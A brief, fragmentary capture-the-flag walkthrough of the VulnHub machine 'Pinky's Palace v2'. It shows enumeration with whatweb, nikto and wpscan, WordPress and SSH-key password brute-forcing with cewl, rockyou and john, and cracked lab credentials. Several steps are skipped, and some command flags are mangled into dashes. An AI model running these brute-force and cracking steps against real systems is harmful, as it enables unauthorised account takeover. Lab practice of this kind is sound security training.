PINKY’S PALACE: V2 Walkthrough
Description: A realistic Boot2Root. Gain access to the system and read the /root/root.txt.
Description: A realistic Boot2Root. Gain access to the system and read the /root/root.txt.
Note From VulnHub: Wordpress will not render correctly. You will need to alter your host file with the IP shown on the console: echo 192.168.x.x pinkydb | sudo tee -a /etc/hosts
Enumeration
Let’s enumerate, 4655 7654 31337
Nothing from those ports.
More Enumeration…
whatweb http://192.168.103.172
Apache[2.4.25], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[192.168.103.172], JQuery[1.12.4], MetaGenerator[WordPress 4.9.4], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[Pinky's Blog – Just another WordPress site], UncommonHeaders[link], WordPress[4.9.4]
- Manual Exploration
Nothing critical
2. Nikto
- /wp-links-opml.php
- /wp-login.php
3. Gobuster
…
Let’s Enumerate Wordpress,
📌 Found a user: pinky1337
and No critical plugin or theme.
Finding Point Of Intrusion (POI)
let’s brute-force the username we got.
- cewl http://pinkydb -w pass.txt -> to generate the password
wpscan — url http://pinkydb -U pinky1337 -P pass.txt
- No password found
2. Rockyou
wpscan — url http://pinkydb -U pinky1337 -P /usr/share/wordlists/rockyou.txt
- Not found in few mins….
Let’s try port knocking,
There is a login page on 7654,
Lets brute force….
john — rules — wordlist=pass.txt — stdout | tee wordlist.txt
Credentials: pinky:Passione
python ssh2john.py id_rsa > id_rsajohn
john — wordlist=/usr/share/wordlists/rockyou.txt id_rsajohn
Stefano:secretz101